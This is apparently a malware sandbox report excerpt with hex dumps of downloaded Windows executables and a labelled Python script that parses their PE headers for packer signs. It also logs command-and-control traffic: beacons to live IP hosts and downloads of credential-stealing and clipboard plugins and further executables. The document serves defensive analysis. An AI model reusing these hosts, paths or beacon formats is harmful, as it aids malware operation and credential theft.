00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:13 GMTContent-Type: application/octet-streamContent-Length: 2327552Last-Modified: Thu, 18 Apr 2024 21:22:33 GMTConnection: keep-aliveETag: "66218f19-238400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 32 04 00 00 00 00 00 00 10 59 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 59 00 00 04 00 00 4d c2 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 5a 58 00 4c 00 00 00 6d 10 15 00 95 00 00 00 00 50 14 00 ec b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 5a 58 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 5a 58 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ec b5 00 00 00 50 14 00 00 82 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2a 00 00 20 15 00 00 02 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 69 72 61 67 7a 65 6a 00 b0 19 00 00 60 3f 00 00 ae 19 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 71 75 73 70 6e 7a 61 00 10 00 00 00 10 59 00 00 02 00 00 00 82 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:15 GMTContent-Type: application/octet-streamContent-Length: 1285632Last-Modified: Thu, 01 Feb 2024 16:00:36 GMTConnection: keep-aliveETag: "65bbc024-139e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 de c9 0d 82 bf a7 5e 82 bf a7 5e 82 bf a7 5e d9 d7 a3 5f 91 bf a7 5e d9 d7 a4 5f 92 bf a7 5e d9 d7 a2 5f 32 bf a7 5e 57 d2 a2 5f c4 bf a7 5e 57 d2 a3 5f 8d bf a7 5e 57 d2 a4 5f 8b bf a7 5e d9 d7 a6 5f 8f bf a7 5e 82 bf a6 5e 43 bf a7 5e 19 d1 ae 5f 86 bf a7 5e 19 d1 a7 5f 83 bf a7 5e 19 d1 58 5e 83 bf a7 5e 19 d1 a5 5f 83 bf a7 5e 52 69 63 68 82 bf a7 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 0f bf bb 65 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 18 00 c0 0f 00 00 52 04 00 00 00 00 00 68 06 0d 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 14 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 89 12 00 58 00 00 00 78 89 12 00 8c 00 00 00 00 20 14 00 f8 00 00 00 00 60 13 00 28 ad 00 00 00 00 00 00 00 00 00 00 00 30 14 00 f4 15 00 00 b0 9e 11 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 9f 11 00 08 01 00 00 00 00 00 00 00 00 00 00 00 d0 0f 00 e8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 be 0f 00 00 10 00 00 00 c0 0f 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 cd 02 00 00 d0 0f 00 00 ce 02 00 00 c4 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c bb 00 00 00 a0 12 00 00 44 00 00 00 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 28 ad 00 00 00 60 13 00 00 ae 00 00 00 d6 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 94 00 00 00 00 10 14 00 00 02 00 00 00 84 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 f8 00 00 00 00 20 14 00 00 02 00 00 00 86 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 15 00 00 00 30 14 00 00 16 00 00 00 88 13 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:19 GMTContent-Type: application/octet-streamContent-Length: 2277888Last-Modified: Thu, 18 Apr 2024 21:22:36 GMTConnection: keep-aliveETag: "66218f1c-22c200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 9f 1a ea 14 fe 74 b9 14 fe 74 b9 14 fe 74 b9 5f 86 77 b8 1f fe 74 b9 5f 86 71 b8 d4 fe 74 b9 5f 86 73 b8 15 fe 74 b9 d6 7f 89 b9 10 fe 74 b9 d6 7f 70 b8 07 fe 74 b9 d6 7f 77 b8 0e fe 74 b9 d6 7f 71 b8 4f fe 74 b9 5f 86 70 b8 0c fe 74 b9 5f 86 72 b8 15 fe 74 b9 5f 86 75 b8 0f fe 74 b9 14 fe 75 b9 34 ff 74 b9 e7 7c 7d b8 08 fe 74 b9 e7 7c 74 b8 15 fe 74 b9 e7 7c 8b b9 15 fe 74 b9 14 fe e3 b9 15 fe 74 b9 e7 7c 76 b8 15 fe 74 b9 52 69 63 68 14 fe 74 b9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 0c 9a 1f 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 34 11 00 00 48 04 00 00 00 00 00 00 90 57 00 00 10 00 00 00 50 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 57 00 00 04 00 00 7e b2 23 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 38 db 56 00 4c 00 00 00 5e 10 15 00 72 00 00 00 00 50 14 00 f8 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 db 56 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 da 56 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 e4 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 14 00 00 10 00 00 00 3e 09 00 00 10 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f8 b2 00 00 00 50 14 00 00 80 00 00 00 4e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 15 00 00 02 00 00 00 ce 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 29 00 00 20 15 00 00 02 00 00 00 d0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 73 70 63 7a 73 72 72 00 f0 18 00 00 a0 3e 00 00 ec 18 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 68 76 75 6c 72 79 6a 00 10 00 00 00 90 57 00 00 04 00 00 00 be 22 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 18 Apr 2024 21:40:19 GMTContent-Type: application/octet-streamContent-Length: 112128Last-Modified: Thu, 01 Feb 2024 16:00:35 GMTConnection: keep-aliveETag: "65bbc023-1b600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 11 bf bb 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 ec 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a1 01 00 9c 00 00 00 bc a1 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 d4 14 00 00 f0 8f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 90 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 23 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 
61 00 00 34 69 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d4 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
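The three responses above are raw PE images, and the second one (the 2277888-byte body served at 21:40:19 GMT) is the file behind the "PE file contains section with special chars" signature. The script below is an added example, not part of the Joe Sandbox report: it parses the headers from the dumped bytes and reproduces that check, then adds two checks a reverser would do next (which section holds the entry point, and whether the section table accounts for the whole downloaded body). The hex constants are copied from the dump; the DOS stub/Rich header and the tail of the optional header are replaced by zero padding (an assumption, since none of the fields read here live there), so the same parser runs unchanged on a complete file. The "unpack buffer" ratio is a heuristic of this example, not something the report states.

```python
"""Parse the dumped PE headers and flag packer-style section layouts."""
import string
import struct
from datetime import datetime, timezone

# Bytes copied from the report's "Data Raw" dump of the 2277888-byte response.
DOS_HEADER = bytes.fromhex(
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 20010000")
COFF_HEADER = bytes.fromhex("50450000 4c01 0600 0c9a1f66 00000000 00000000 e000 0201")
OPT_HEADER_PREFIX = bytes.fromhex(        # Magic .. ImageBase (first 32 bytes)
    "0b01 0e27 00341100 00480400 00000000 00905700 00100000 00501100 00400000")
SECTION_TABLE = bytes.fromhex(            # name vsize vaddr rawsz rawptr reloc line nrel nlin flags
    "2020200020202020 00401400 00100000 003e0900 00100000 00000000 00000000 0000 0000 400000e0"
    "2e72737263000000 f8b20000 00501400 00800000 004e0900 00000000 00000000 0000 0000 400000c0"
    "2e69646174612020 00100000 00101500 00020000 00ce0900 00000000 00000000 0000 0000 400000c0"
    "2020202020202020 00802900 00201500 00020000 00d00900 00000000 00000000 0000 0000 400000e0"
    "647370637a737272 00f01800 00a03e00 00ec1800 00d20900 00000000 00000000 0000 0000 400000e0"
    "626876756c72796a 00100000 00905700 00040000 00be2200 00000000 00000000 0000 0000 400000e0")

E_LFANEW = struct.unpack_from("<I", DOS_HEADER, 0x3C)[0]     # 0x120 in this dump
OPT_SIZE = struct.unpack_from("<H", COFF_HEADER, 20)[0]      # SizeOfOptionalHeader, 0xE0
# Regions not transcribed from the dump are zero-filled (assumption: not needed below).
IMAGE = (DOS_HEADER + b"\0" * (E_LFANEW - len(DOS_HEADER))
         + COFF_HEADER + OPT_HEADER_PREFIX + b"\0" * (OPT_SIZE - len(OPT_HEADER_PREFIX))
         + SECTION_TABLE)

ALLOWED = set(string.ascii_letters + string.digits + "._$")   # what a linker normally emits

def parse_pe(data):
    """Minimal PE walk: DOS header -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]            # 0x10B = PE32, 0x20B = PE32+
    entry = struct.unpack_from("<I", data, opt + 16)[0]       # AddressOfEntryPoint (RVA)
    sections, off = [], opt + opt_size
    for _ in range(nsec):
        raw, vsize, vaddr, rsize, rptr, _, _, _, _, flags = struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append({"name": raw.split(b"\0", 1)[0].decode("latin-1"),
                         "vsize": vsize, "vaddr": vaddr, "raw_size": rsize,
                         "raw_ptr": rptr, "flags": flags})
        off += 40
    return {"machine": machine, "timestamp": ts, "characteristics": chars,
            "magic": magic, "entry": entry, "sections": sections}

def suspicious_section_names(pe):
    """Names that are blank or contain anything outside [A-Za-z0-9._$] (spaces included)."""
    return [s["name"] for s in pe["sections"]
            if not s["name"].strip() or any(c not in ALLOWED for c in s["name"])]

def entry_section(pe):
    """Section whose address range contains AddressOfEntryPoint, or None."""
    for s in pe["sections"]:
        if s["vaddr"] <= pe["entry"] < s["vaddr"] + max(s["vsize"], s["raw_size"]):
            return s
    return None

def unpack_buffers(pe, ratio=16):
    """Sections whose in-memory size dwarfs their on-disk size (heuristic of this example)."""
    return [s["name"] for s in pe["sections"]
            if s["raw_size"] and s["vsize"] // s["raw_size"] >= ratio]

def file_end(pe):
    """Highest file offset the section table accounts for; compare with Content-Length."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])

def build_date(pe):
    """COFF TimeDateStamp as a UTC calendar date (easily forged, but worth recording)."""
    return datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc).strftime("%Y-%m-%d")

if __name__ == "__main__":
    pe = parse_pe(IMAGE)
    print(f"machine=0x{pe['machine']:x} magic=0x{pe['magic']:x} built={build_date(pe)}")
    for s in pe["sections"]:
        print(f"  {s['name']!r:12} vaddr=0x{s['vaddr']:06x} vsize=0x{s['vsize']:06x} "
              f"raw=0x{s['raw_size']:06x}@0x{s['raw_ptr']:06x} flags=0x{s['flags']:08x}")
    print("special-char names:", suspicious_section_names(pe))
    print("entry in:", entry_section(pe)["name"], "| unpack buffers:", unpack_buffers(pe))
    print("section table ends at", file_end(pe), "bytes")
```

Three of the six names fail the character check (a three-space name, ".idata" padded with spaces instead of NULs, and an all-space name), which is what the signature is keyed on. The entry point (0x579000) sits in the last section, "bhvulryj", which is only 0x400 bytes on disk and is readable, writable and executable (0xE0000040), and the all-space section reserves 0x298000 bytes in memory against 0x200 on disk: the usual shape of a packer stub unpacking into a reserved buffer. The last section's raw offset plus size is exactly 2277888, so the body the sandbox captured is the complete image rather than a truncated download.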
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 21Cache-Control: no-cacheData Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d Data Ascii: id=246122658369&cred=
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000054001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000055001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000056001&unit=246122658369
